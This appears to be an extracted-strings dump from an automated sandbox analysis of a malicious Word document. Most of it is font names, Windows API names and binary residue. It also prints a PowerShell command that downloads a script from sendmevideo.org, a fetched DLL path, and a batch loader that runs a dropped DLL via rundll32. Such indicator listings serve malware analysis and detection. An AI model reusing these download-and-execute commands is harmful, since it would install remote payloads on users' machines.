Unicode based on Dropped File (carved_0.dll.1509628513544)

Palace Script MT

Unicode based on Runtime Data (WINWORD.EXE )

PK!$[Content_Types].xml (MO@&Wz0M.C~dgJKZ23J<*kROz,#m,eEDi

Ansi based on Dropped File (~WRD0000.tmp)

Ansi based on Dropped File (~WRD0002.tmp)

PK-!$[Content_Types].xmlPK-!N_rels/.relsPK-!|;9"word/_rels/document.xml.relsPK-!yUBword/document.xmlPK-!/]N word/theme/theme1.xmlPK-!5Iword/settings.xmlPK-!Nword/webSettings.xmlPK-!To^=word/stylesWithEffects.xmlPK-!_DMt!docProps/core.xmlPK-!e:)?m:U$word/styles.xmlPK-!EOM+word/fontTable.xmlPK-!uwv-docProps/app.xmlPKb0

Ansi based on Dropped File (~WRD0000.tmp)

Process32First

Ansi based on PCAP Processing (network.pcap)

Process32Next

Ansi based on PCAP Processing (network.pcap)

R`parD"[2nCeun`X?x-^XiF'*1L-]3NiK^"C!FNs=g@\o^^h^^h;l/izfNpA{;$8cg]|s);O:SpJMTcaZEobb*y2"_CZ4JNLz4eQizIaL* 42@-^\MCG-&+[WFWmf$PjMZ-sunX-U=FUMt]7 '#8M#p'[VW8?8PU 6jWfT=v&Pj7NxX

Ansi based on Dropped File (~WRD0000.tmp)

RegCloseKey

Ansi based on PCAP Processing (network.pcap)

RegCreateKeyExA

Ansi based on PCAP Processing (network.pcap)

RegOpenKeyExA

Ansi based on PCAP Processing (network.pcap)

RegQueryValueExA

Ansi based on PCAP Processing (network.pcap)

RegSetValueExA

Ansi based on PCAP Processing (network.pcap)

Ansi based on Dropped File (~WRD0000.tmp)

satellitedeluxpanorama.com

Ansi based on PCAP Processing (network.pcap)

satellitedeluxpanorama.com0

Ansi based on PCAP Processing (network.pcap)

Script MT Bold

Unicode based on Runtime Data (WINWORD.EXE )

Segoe Script

Unicode based on Runtime Data (WINWORD.EXE )

sendmevideo.org

Ansi based on PCAP Processing (PCAP)

ServicesActive

Unicode based on Runtime Data (rundll32.exe )

set inst_pck = "%ALLUSERSPROFILE%\mvdrt.dll"

Ansi based on Dropped File (mvdrt.bat)

set inst_pck = "%ALLUSERSPROFILE%\mvdrt.dll"if NOT exist %inst_pck % (exit)start rundll32.exe %inst_pck %,#1

Ansi based on Dropped File (mvdrt.bat)

SetLastError

Ansi based on PCAP Processing (network.pcap)

SHGetSpecialFolderPathW

Ansi based on PCAP Processing (network.pcap)

source.android.google.cn

Ansi based on PCAP Processing (network.pcap)

start rundll32.exe %inst_pck %,#1

Ansi based on Dropped File (mvdrt.bat)

StringFileInfo

Unicode based on Dropped File (carved_0.dll.1509628513544)

System.Net.WebClient.DownlodString('http://sendmevideo.org/dh2025e/eee.txt');powershell;

Ansi based on Process Commandline (00040140-00002460)

t{-E;X6?vX&+$Hy'r}}W6]1oXWV:DzHp*\;\)4{wt%n0,vFO9cxY:Y7,N%gwY PK!e:)?m:word/styles.xmlS8oiHi^i{gVMm+g+]>~Vw yGOfJ'dP%wOHBD.G<F2@;L`+c;Nca2LbQ+)8bE*W:21~,$]VZXiKu :GX4*Hutf{4?&XE0x-\+d2I

Ansi based on Dropped File (~WRD0000.tmp)

v`g/~{_Mc4(i%a)S.Lp)D^i)XKf\m

Ansi based on Dropped File (~WRD0000.tmp)

VarFileInfo

Unicode based on Dropped File (carved_0.dll.1509628513544)

VerifyVersionInfoW

Ansi based on PCAP Processing (network.pcap)

Vladimir Script

Unicode based on Runtime Data (WINWORD.EXE )

VS_VERSION_INFO

Unicode based on Dropped File (carved_0.dll.1509628513544)

W=8}L$mNz7"T-ur_(/IuvX?z~6po+Ua/

Ansi based on Dropped File (~WRD0000.tmp)

www.goo.gl

Ansi based on PCAP Processing (network.pcap)

youtube.com

Ansi based on PCAP Processing (network.pcap)

youtubeeducation.com

Ansi based on PCAP Processing (network.pcap)

Z,P6vO[f6C=\f{Ya)7$vj?G(a

Ansi based on Dropped File (~WRD0000.tmp)

zk7^U}p'6XpgE3/,\hv.KDY

Ansi based on Dropped File (~WRD0000.tmp)

zMU=ZNz@*Qba@r"M:y+0Ow2}oIc,XP@&DBAIJqD(

Ansi based on Dropped File (~WRD0000.tmp)

{09477111-DE61-43CD-A5AA-D9F7B489301F}

Unicode based on Runtime Data (rundll32.exe )

|sJXOI|x"Ef.2%>>2S^Xb)?w.E"drtz]"=Z^Xcf8bm$$<R6g./

Ansi based on Dropped File (~WRD0000.tmp)

~xM`ijU <8PU 6o#\vMST';@5:k&017qq.bkx@lypx@lmla(y{%]

Ansi based on Dropped File (~WRD0000.tmp)

~xM`ijU <8PU 6o\vMSTs;@5oex@KA##8M

Ansi based on Dropped File (~WRD0000.tmp)

System.Net.WebClient.DownlodString('http://sendmevideo.org/dh2025e/eee.txt');powershell;

Ansi based on Process Commandline (00040140-00002460)

Ansi based on Process Commandline (00040970-00001420)

/dh2025e/eee.txt

Ansi based on PCAP Processing (PCAP)

/dh2025e/eh.dll

Ansi based on PCAP Processing (PCAP)

sendmevideo.org

Ansi based on PCAP Processing (PCAP)

<h1>Not Found</h1>The requested URL // was not found on this server.

Ansi based on Dropped File (VRzZ5.vnd[1].txt)

/n "C:\759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx"

Ansi based on Process Commandline (WINWORD.EXE)

%PROGRAMFILES%\Microsoft Office\Office14\wwlib.dll

Unicode based on Runtime Data (WINWORD.EXE )

@Arial Unicode MS

Unicode based on Runtime Data (WINWORD.EXE )

@Batang

Unicode based on Runtime Data (WINWORD.EXE )

@BatangChe

Unicode based on Runtime Data (WINWORD.EXE )

@DFKai-SB

Unicode based on Runtime Data (WINWORD.EXE )

@Dotum

Unicode based on Runtime Data (WINWORD.EXE )

@DotumChe

Unicode based on Runtime Data (WINWORD.EXE )

@FangSong

Unicode based on Runtime Data (WINWORD.EXE )

@Gulim

Unicode based on Runtime Data (WINWORD.EXE )

@GulimChe

Unicode based on Runtime Data (WINWORD.EXE )

@Gungsuh

Unicode based on Runtime Data (WINWORD.EXE )

@GungsuhChe

Unicode based on Runtime Data (WINWORD.EXE )

@KaiTi

Unicode based on Runtime Data (WINWORD.EXE )

@Malgun Gothic

Unicode based on Runtime Data (WINWORD.EXE )

@Meiryo

Unicode based on Runtime Data (WINWORD.EXE )

@Meiryo UI

Unicode based on Runtime Data (WINWORD.EXE )

@Microsoft JhengHei

Unicode based on Runtime Data (WINWORD.EXE )

@Microsoft YaHei

Unicode based on Runtime Data (WINWORD.EXE )

@MingLiU

Unicode based on Runtime Data (WINWORD.EXE )

@MingLiU-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

@MingLiU_HKSCS

Unicode based on Runtime Data (WINWORD.EXE )

@MingLiU_HKSCS-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

@MS Gothic

Unicode based on Runtime Data (WINWORD.EXE )

@MS Mincho

Unicode based on Runtime Data (WINWORD.EXE )

@MS PGothic

Unicode based on Runtime Data (WINWORD.EXE )

@MS PMincho

Unicode based on Runtime Data (WINWORD.EXE )

@MS UI Gothic

Unicode based on Runtime Data (WINWORD.EXE )

@NSimSun

Unicode based on Runtime Data (WINWORD.EXE )

@PMingLiU

Unicode based on Runtime Data (WINWORD.EXE )

@PMingLiU-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

@SimHei

Unicode based on Runtime Data (WINWORD.EXE )

@SimSun

Unicode based on Runtime Data (WINWORD.EXE )

@SimSun-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\New Microsoft Word Document.docx

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D353DC2DAD29B0][O00000000]*C:\

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D353DC2DB036F0][O00000000]*C:\759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx

Unicode based on Runtime Data (WINWORD.EXE )

`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (WINWORD.EXE )

`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (WINWORD.EXE )

Agency FB

Unicode based on Runtime Data (WINWORD.EXE )

AgentAnim

Unicode based on Runtime Data (WINWORD.EXE )

Aharoni

Unicode based on Runtime Data (WINWORD.EXE )

Algerian

Unicode based on Runtime Data (WINWORD.EXE )

Andalus

Unicode based on Runtime Data (WINWORD.EXE )

Angsana New

Unicode based on Runtime Data (WINWORD.EXE )

AngsanaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Aparajita

Unicode based on Runtime Data (WINWORD.EXE )

Arabic Typesetting

Unicode based on Runtime Data (WINWORD.EXE )

Arial

Unicode based on Runtime Data (WINWORD.EXE )

Arial Black

Unicode based on Runtime Data (WINWORD.EXE )

Arial Narrow

Unicode based on Runtime Data (WINWORD.EXE )

Arial Rounded MT Bold

Unicode based on Runtime Data (WINWORD.EXE )

Arial Unicode MS

Unicode based on Runtime Data (WINWORD.EXE )

AutoDetect

Unicode based on Runtime Data (WINWORD.EXE )

Baskerville Old Face

Unicode based on Runtime Data (WINWORD.EXE )

Batang

Unicode based on Runtime Data (WINWORD.EXE )

BatangChe

Unicode based on Runtime Data (WINWORD.EXE )

Bauhaus 93

Unicode based on Runtime Data (WINWORD.EXE )

BB0744FB

Unicode based on Runtime Data (WINWORD.EXE )

Bell MT

Unicode based on Runtime Data (WINWORD.EXE )

Berlin Sans FB

Unicode based on Runtime Data (WINWORD.EXE )

Berlin Sans FB Demi

Unicode based on Runtime Data (WINWORD.EXE )

Bernard MT Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Blackadder ITC

Unicode based on Runtime Data (WINWORD.EXE )

Bodoni MT

Unicode based on Runtime Data (WINWORD.EXE )

Bodoni MT Black

Unicode based on Runtime Data (WINWORD.EXE )

Bodoni MT Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Bodoni MT Poster Compressed

Unicode based on Runtime Data (WINWORD.EXE )

Book Antiqua

Unicode based on Runtime Data (WINWORD.EXE )

Bookman Old Style

Unicode based on Runtime Data (WINWORD.EXE )

Bookshelf Symbol 7

Unicode based on Runtime Data (WINWORD.EXE )

Bradley Hand ITC

Unicode based on Runtime Data (WINWORD.EXE )

Britannic Bold

Unicode based on Runtime Data (WINWORD.EXE )

Broadway

Unicode based on Runtime Data (WINWORD.EXE )

Browallia New

Unicode based on Runtime Data (WINWORD.EXE )

BrowalliaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Brush Script MT

Unicode based on Runtime Data (WINWORD.EXE )

Californian FB

Unicode based on Runtime Data (WINWORD.EXE )

Calisto MT

Unicode based on Runtime Data (WINWORD.EXE )

Cambria Math

Unicode based on Runtime Data (WINWORD.EXE )

Candara

Unicode based on Runtime Data (WINWORD.EXE )

Castellar

Unicode based on Runtime Data (WINWORD.EXE )

Centaur

Unicode based on Runtime Data (WINWORD.EXE )

Century

Unicode based on Runtime Data (WINWORD.EXE )

Century Gothic

Unicode based on Runtime Data (WINWORD.EXE )

Century Schoolbook

Unicode based on Runtime Data (WINWORD.EXE )

Chiller

Unicode based on Runtime Data (WINWORD.EXE )

Colonna MT

Unicode based on Runtime Data (WINWORD.EXE )

Comic Sans MS

Unicode based on Runtime Data (WINWORD.EXE )

Consolas

Unicode based on Runtime Data (WINWORD.EXE )

Constantia

Unicode based on Runtime Data (WINWORD.EXE )

Cooper Black

Unicode based on Runtime Data (WINWORD.EXE )

Copperplate Gothic Bold

Unicode based on Runtime Data (WINWORD.EXE )

Copperplate Gothic Light

Unicode based on Runtime Data (WINWORD.EXE )

Corbel

Unicode based on Runtime Data (WINWORD.EXE )

Cordia New

Unicode based on Runtime Data (WINWORD.EXE )

CordiaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Courier New

Unicode based on Runtime Data (WINWORD.EXE )

Curlz MT

Unicode based on Runtime Data (WINWORD.EXE )

DaunPenh

Unicode based on Runtime Data (WINWORD.EXE )

David

Unicode based on Runtime Data (WINWORD.EXE )

DFKai-SB

Unicode based on Runtime Data (WINWORD.EXE )

DilleniaUPC

Unicode based on Runtime Data (WINWORD.EXE )

DokChampa

Unicode based on Runtime Data (WINWORD.EXE )

Dotum

Unicode based on Runtime Data (WINWORD.EXE )

DotumChe

Unicode based on Runtime Data (WINWORD.EXE )

Ebrima

Unicode based on Runtime Data (WINWORD.EXE )

Edwardian Script ITC

Unicode based on Runtime Data (WINWORD.EXE )

Elephant

Unicode based on Runtime Data (WINWORD.EXE )

Engravers MT

Unicode based on Runtime Data (WINWORD.EXE )

Eras Bold ITC

Unicode based on Runtime Data (WINWORD.EXE )

Eras Demi ITC

Unicode based on Runtime Data (WINWORD.EXE )

Eras Light ITC

Unicode based on Runtime Data (WINWORD.EXE )

Eras Medium ITC

Unicode based on Runtime Data (WINWORD.EXE )

Estrangelo Edessa

Unicode based on Runtime Data (WINWORD.EXE )

EucrosiaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Euphemia

Unicode based on Runtime Data (WINWORD.EXE )

FangSong

Unicode based on Runtime Data (WINWORD.EXE )

Felix Titling

Unicode based on Runtime Data (WINWORD.EXE )

Footlight MT Light

Unicode based on Runtime Data (WINWORD.EXE )

Forte

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Book

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Demi

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Demi Cond

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Heavy

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Medium

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Medium Cond

Unicode based on Runtime Data (WINWORD.EXE )

FrankRuehl

Unicode based on Runtime Data (WINWORD.EXE )

FreesiaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Freestyle Script

Unicode based on Runtime Data (WINWORD.EXE )

French Script MT

Unicode based on Runtime Data (WINWORD.EXE )

Gabriola

Unicode based on Runtime Data (WINWORD.EXE )

Garamond

Unicode based on Runtime Data (WINWORD.EXE )

Gautami

Unicode based on Runtime Data (WINWORD.EXE )

Georgia

Unicode based on Runtime Data (WINWORD.EXE )

Gill Sans MT

Unicode based on Runtime Data (WINWORD.EXE )

Gill Sans MT Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Gill Sans MT Ext Condensed Bold

Unicode based on Runtime Data (WINWORD.EXE )

Gill Sans Ultra Bold

Unicode based on Runtime Data (WINWORD.EXE )

Gill Sans Ultra Bold Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Gisha

Unicode based on Runtime Data (WINWORD.EXE )

Gloucester MT Extra Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Goudy Old Style

Unicode based on Runtime Data (WINWORD.EXE )

Goudy Stout

Unicode based on Runtime Data (WINWORD.EXE )

Gulim

Unicode based on Runtime Data (WINWORD.EXE )

GulimChe

Unicode based on Runtime Data (WINWORD.EXE )

Gungsuh

Unicode based on Runtime Data (WINWORD.EXE )

GungsuhChe

Unicode based on Runtime Data (WINWORD.EXE )

Haettenschweiler

Unicode based on Runtime Data (WINWORD.EXE )

Harlow Solid Italic

Unicode based on Runtime Data (WINWORD.EXE )

Harrington

Unicode based on Runtime Data (WINWORD.EXE )

High Tower Text

Unicode based on Runtime Data (WINWORD.EXE )

Impact

Unicode based on Runtime Data (WINWORD.EXE )

Imprint MT Shadow

Unicode based on Runtime Data (WINWORD.EXE )

Informal Roman

Unicode based on Runtime Data (WINWORD.EXE )

IntranetName

Unicode based on Runtime Data (WINWORD.EXE )

IrisUPC

Unicode based on Runtime Data (WINWORD.EXE )

Iskoola Pota

Unicode based on Runtime Data (WINWORD.EXE )

Item 1

Unicode based on Runtime Data (WINWORD.EXE )

Item 10

Unicode based on Runtime Data (WINWORD.EXE )

Item 11

Unicode based on Runtime Data (WINWORD.EXE )

Item 12

Unicode based on Runtime Data (WINWORD.EXE )

Item 13

Unicode based on Runtime Data (WINWORD.EXE )

Item 14

Unicode based on Runtime Data (WINWORD.EXE )

Item 15

Unicode based on Runtime Data (WINWORD.EXE )

Item 16

Unicode based on Runtime Data (WINWORD.EXE )

Item 17

Unicode based on Runtime Data (WINWORD.EXE )

Item 18

Unicode based on Runtime Data (WINWORD.EXE )

Item 19

Unicode based on Runtime Data (WINWORD.EXE )

Item 2

Unicode based on Runtime Data (WINWORD.EXE )

Item 20

Unicode based on Runtime Data (WINWORD.EXE )

Item 21

Unicode based on Runtime Data (WINWORD.EXE )

Item 22

Unicode based on Runtime Data (WINWORD.EXE )

Item 23

Unicode based on Runtime Data (WINWORD.EXE )

Item 24

Unicode based on Runtime Data (WINWORD.EXE )

Item 25

Unicode based on Runtime Data (WINWORD.EXE )

Item 26

Unicode based on Runtime Data (WINWORD.EXE )

Item 27

Unicode based on Runtime Data (WINWORD.EXE )

Item 28

Unicode based on Runtime Data (WINWORD.EXE )

Item 29

Unicode based on Runtime Data (WINWORD.EXE )

Item 3

Unicode based on Runtime Data (WINWORD.EXE )

Item 30

Unicode based on Runtime Data (WINWORD.EXE )

Item 31

Unicode based on Runtime Data (WINWORD.EXE )

Item 32

Unicode based on Runtime Data (WINWORD.EXE )

Item 33

Unicode based on Runtime Data (WINWORD.EXE )

Item 34

Unicode based on Runtime Data (WINWORD.EXE )

Item 35

Unicode based on Runtime Data (WINWORD.EXE )

Item 36

Unicode based on Runtime Data (WINWORD.EXE )

Item 37

Unicode based on Runtime Data (WINWORD.EXE )

Item 38

Unicode based on Runtime Data (WINWORD.EXE )

Item 39

Unicode based on Runtime Data (WINWORD.EXE )

Item 4

Unicode based on Runtime Data (WINWORD.EXE )

Item 40

Unicode based on Runtime Data (WINWORD.EXE )

Item 41

Unicode based on Runtime Data (WINWORD.EXE )

Item 42

Unicode based on Runtime Data (WINWORD.EXE )

Item 43

Unicode based on Runtime Data (WINWORD.EXE )

Item 44

Unicode based on Runtime Data (WINWORD.EXE )

Item 45

Unicode based on Runtime Data (WINWORD.EXE )

Item 46

Unicode based on Runtime Data (WINWORD.EXE )

Item 47

Unicode based on Runtime Data (WINWORD.EXE )

Item 48

Unicode based on Runtime Data (WINWORD.EXE )

Item 49

Unicode based on Runtime Data (WINWORD.EXE )

Item 5

Unicode based on Runtime Data (WINWORD.EXE )

Item 50

Unicode based on Runtime Data (WINWORD.EXE )

Item 6

Unicode based on Runtime Data (WINWORD.EXE )

Item 7

Unicode based on Runtime Data (WINWORD.EXE )

Item 8

Unicode based on Runtime Data (WINWORD.EXE )

Item 9

Unicode based on Runtime Data (WINWORD.EXE )

JasmineUPC

Unicode based on Runtime Data (WINWORD.EXE )

Jokerman

Unicode based on Runtime Data (WINWORD.EXE )

Juice ITC

Unicode based on Runtime Data (WINWORD.EXE )

KaiTi

Unicode based on Runtime Data (WINWORD.EXE )

Kalinga

Unicode based on Runtime Data (WINWORD.EXE )

Kartika

Unicode based on Runtime Data (WINWORD.EXE )

Khmer UI

Unicode based on Runtime Data (WINWORD.EXE )

KodchiangUPC

Unicode based on Runtime Data (WINWORD.EXE )

Kokila

Unicode based on Runtime Data (WINWORD.EXE )

Kristen ITC

Unicode based on Runtime Data (WINWORD.EXE )

Kunstler Script

Unicode based on Runtime Data (WINWORD.EXE )

Lao UI

Unicode based on Runtime Data (WINWORD.EXE )

LastPurgeTime

Unicode based on Runtime Data (WINWORD.EXE )

Latha

Unicode based on Runtime Data (WINWORD.EXE )

Leelawadee

Unicode based on Runtime Data (WINWORD.EXE )

Levenim MT

Unicode based on Runtime Data (WINWORD.EXE )

LilyUPC

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Bright

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Calligraphy

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Console

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Fax

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Handwriting

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Sans

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Sans Typewriter

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Sans Unicode

Unicode based on Runtime Data (WINWORD.EXE )

Magneto

Unicode based on Runtime Data (WINWORD.EXE )

Maiandra GD

Unicode based on Runtime Data (WINWORD.EXE )

Malgun Gothic

Unicode based on Runtime Data (WINWORD.EXE )

Mangal

Unicode based on Runtime Data (WINWORD.EXE )

Marlett

Unicode based on Runtime Data (WINWORD.EXE )

Matura MT Script Capitals

Unicode based on Runtime Data (WINWORD.EXE )

Max Display

Unicode based on Runtime Data (WINWORD.EXE )

Meiryo

Unicode based on Runtime Data (WINWORD.EXE )

Meiryo UI

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Himalaya

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft JhengHei

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft New Tai Lue

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft PhagsPa

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Sans Serif

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Tai Le

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Uighur

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft YaHei

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Yi Baiti

Unicode based on Runtime Data (WINWORD.EXE )

MingLiU

Unicode based on Runtime Data (WINWORD.EXE )

MingLiU-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

MingLiU_HKSCS

Unicode based on Runtime Data (WINWORD.EXE )

MingLiU_HKSCS-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

Miriam

Unicode based on Runtime Data (WINWORD.EXE )

Miriam Fixed

Unicode based on Runtime Data (WINWORD.EXE )

Mistral

Unicode based on Runtime Data (WINWORD.EXE )

Modern No. 20

Unicode based on Runtime Data (WINWORD.EXE )

Mongolian Baiti

Unicode based on Runtime Data (WINWORD.EXE )

Monotype Corsiva

Unicode based on Runtime Data (WINWORD.EXE )

MoolBoran

Unicode based on Runtime Data (WINWORD.EXE )

MS Gothic

Unicode based on Runtime Data (WINWORD.EXE )

MS Mincho

Unicode based on Runtime Data (WINWORD.EXE )

MS Outlook

Unicode based on Runtime Data (WINWORD.EXE )

MS PGothic

Unicode based on Runtime Data (WINWORD.EXE )

MS PMincho

Unicode based on Runtime Data (WINWORD.EXE )

MS Reference Sans Serif

Unicode based on Runtime Data (WINWORD.EXE )

MS Reference Specialty

Unicode based on Runtime Data (WINWORD.EXE )

MS UI Gothic

Unicode based on Runtime Data (WINWORD.EXE )

MSOBALLOON

Unicode based on Runtime Data (WINWORD.EXE )

MsoHelp10

Unicode based on Runtime Data (WINWORD.EXE )

mspim_wnd32

Unicode based on Runtime Data (WINWORD.EXE )

MT Extra

Unicode based on Runtime Data (WINWORD.EXE )

MV Boli

Unicode based on Runtime Data (WINWORD.EXE )

Narkisim

Unicode based on Runtime Data (WINWORD.EXE )

NextUpdate

Unicode based on Runtime Data (WINWORD.EXE )

Niagara Engraved

Unicode based on Runtime Data (WINWORD.EXE )

Niagara Solid

Unicode based on Runtime Data (WINWORD.EXE )

NSimSun

Unicode based on Runtime Data (WINWORD.EXE )

Nyala

Unicode based on Runtime Data (WINWORD.EXE )

OCR A Extended

Unicode based on Runtime Data (WINWORD.EXE )

Old English Text MT

Unicode based on Runtime Data (WINWORD.EXE )

Palace Script MT

Unicode based on Runtime Data (WINWORD.EXE )

Palatino Linotype

Unicode based on Runtime Data (WINWORD.EXE )

Papyrus

Unicode based on Runtime Data (WINWORD.EXE )

Parchment

Unicode based on Runtime Data (WINWORD.EXE )

Perpetua

Unicode based on Runtime Data (WINWORD.EXE )

Perpetua Titling MT

Unicode based on Runtime Data (WINWORD.EXE )

Plantagenet Cherokee

Unicode based on Runtime Data (WINWORD.EXE )

Playbill

Unicode based on Runtime Data (WINWORD.EXE )

PMingLiU

Unicode based on Runtime Data (WINWORD.EXE )

PMingLiU-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

Poor Richard

Unicode based on Runtime Data (WINWORD.EXE )

Pristina

Unicode based on Runtime Data (WINWORD.EXE )

ProductFiles

Unicode based on Runtime Data (WINWORD.EXE )

ProductNonBootFilesIntl_1033

Unicode based on Runtime Data (WINWORD.EXE )

ProxyBypass

Unicode based on Runtime Data (WINWORD.EXE )

Raavi

Unicode based on Runtime Data (WINWORD.EXE )

Rage Italic

Unicode based on Runtime Data (WINWORD.EXE )

Ravie

Unicode based on Runtime Data (WINWORD.EXE )

Rockwell

Unicode based on Runtime Data (WINWORD.EXE )

Rockwell Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Rockwell Extra Bold

Unicode based on Runtime Data (WINWORD.EXE )

Sakkal Majalla

Unicode based on Runtime Data (WINWORD.EXE )

Script MT Bold

Unicode based on Runtime Data (WINWORD.EXE )

Segoe Print

Unicode based on Runtime Data (WINWORD.EXE )

Segoe Script

Unicode based on Runtime Data (WINWORD.EXE )

Segoe UI

Unicode based on Runtime Data (WINWORD.EXE )

Segoe UI Light

Unicode based on Runtime Data (WINWORD.EXE )

Segoe UI Semibold

Unicode based on Runtime Data (WINWORD.EXE )

Segoe UI Symbol

Unicode based on Runtime Data (WINWORD.EXE )

Shonar Bangla

Unicode based on Runtime Data (WINWORD.EXE )

Showcard Gothic

Unicode based on Runtime Data (WINWORD.EXE )

Shruti

Unicode based on Runtime Data (WINWORD.EXE )

SimHei

Unicode based on Runtime Data (WINWORD.EXE )

Simplified Arabic

Unicode based on Runtime Data (WINWORD.EXE )

Simplified Arabic Fixed

Unicode based on Runtime Data (WINWORD.EXE )

SimSun

Unicode based on Runtime Data (WINWORD.EXE )

SimSun-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

Site 1

Unicode based on Runtime Data (WINWORD.EXE )

Site 10

Unicode based on Runtime Data (WINWORD.EXE )

Site 11

Unicode based on Runtime Data (WINWORD.EXE )

Site 12

Unicode based on Runtime Data (WINWORD.EXE )

Site 13

Unicode based on Runtime Data (WINWORD.EXE )

Site 14

Unicode based on Runtime Data (WINWORD.EXE )

Site 15

Unicode based on Runtime Data (WINWORD.EXE )

Site 16

Unicode based on Runtime Data (WINWORD.EXE )

Site 17

Unicode based on Runtime Data (WINWORD.EXE )

Site 18

Unicode based on Runtime Data (WINWORD.EXE )

Site 19

Unicode based on Runtime Data (WINWORD.EXE )

Site 2

Unicode based on Runtime Data (WINWORD.EXE )

Site 20

Unicode based on Runtime Data (WINWORD.EXE )

Site 3

Unicode based on Runtime Data (WINWORD.EXE )

Site 4

Unicode based on Runtime Data (WINWORD.EXE )

Site 5

Unicode based on Runtime Data (WINWORD.EXE )

Site 6

Unicode based on Runtime Data (WINWORD.EXE )

Site 7

Unicode based on Runtime Data (WINWORD.EXE )

Site 8

Unicode based on Runtime Data (WINWORD.EXE )

Site 9

Unicode based on Runtime Data (WINWORD.EXE )

Snap ITC

Unicode based on Runtime Data (WINWORD.EXE )

SpellingAndGrammarFiles_1033

Unicode based on Runtime Data (WINWORD.EXE )

SpellingAndGrammarFiles_1036

Unicode based on Runtime Data (WINWORD.EXE )

SpellingAndGrammarFiles_3082

Unicode based on Runtime Data (WINWORD.EXE )

Stencil

Unicode based on Runtime Data (WINWORD.EXE )

Sylfaen

Unicode based on Runtime Data (WINWORD.EXE )

Symbol

Unicode based on Runtime Data (WINWORD.EXE )

Tahoma

Unicode based on Runtime Data (WINWORD.EXE )

Tempus Sans ITC

Unicode based on Runtime Data (WINWORD.EXE )

Traditional Arabic

Unicode based on Runtime Data (WINWORD.EXE )

Trebuchet MS

Unicode based on Runtime Data (WINWORD.EXE )

Tunga

Unicode based on Runtime Data (WINWORD.EXE )

Tw Cen MT

Unicode based on Runtime Data (WINWORD.EXE )

Tw Cen MT Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Tw Cen MT Condensed Extra Bold

Unicode based on Runtime Data (WINWORD.EXE )

UNCAsIntranet

Unicode based on Runtime Data (WINWORD.EXE )

Utsaah

Unicode based on Runtime Data (WINWORD.EXE )

Verdana

Unicode based on Runtime Data (WINWORD.EXE )

Vijaya

Unicode based on Runtime Data (WINWORD.EXE )

Viner Hand ITC

Unicode based on Runtime Data (WINWORD.EXE )

Vivaldi

Unicode based on Runtime Data (WINWORD.EXE )

Vladimir Script

Unicode based on Runtime Data (WINWORD.EXE )

Vrinda

Unicode based on Runtime Data (WINWORD.EXE )

Webdings

Unicode based on Runtime Data (WINWORD.EXE )

Wide Latin

Unicode based on Runtime Data (WINWORD.EXE )

Wingdings

Unicode based on Runtime Data (WINWORD.EXE )

Wingdings 2

Unicode based on Runtime Data (WINWORD.EXE )

Wingdings 3

Unicode based on Runtime Data (WINWORD.EXE )

WORDFiles

Unicode based on Runtime Data (WINWORD.EXE )

%s "%s", %s

Unicode based on Dropped File (carved_0.dll.1509628513544)

%s - %lu

Ansi based on Dropped File (carved_0.dll.1509628513544)

.edata

Ansi based on Dropped File (carved_0.dll.1509628513544)

.idata$2

Ansi based on Dropped File (carved_0.dll.1509628513544)

.idata$3

Ansi based on Dropped File (carved_0.dll.1509628513544)

.idata$4

Ansi based on Dropped File (carved_0.dll.1509628513544)

.idata$5

Ansi based on Dropped File (carved_0.dll.1509628513544)

.idata$6

Ansi based on Dropped File (carved_0.dll.1509628513544)

.rdata

Ansi based on Dropped File (carved_0.dll.1509628513544)

.rsrc

Ansi based on Dropped File (carved_0.dll.1509628513544)

.rsrc$01

Ansi based on Dropped File (carved_0.dll.1509628513544)

.rsrc$02

Ansi based on Dropped File (carved_0.dll.1509628513544)

.text

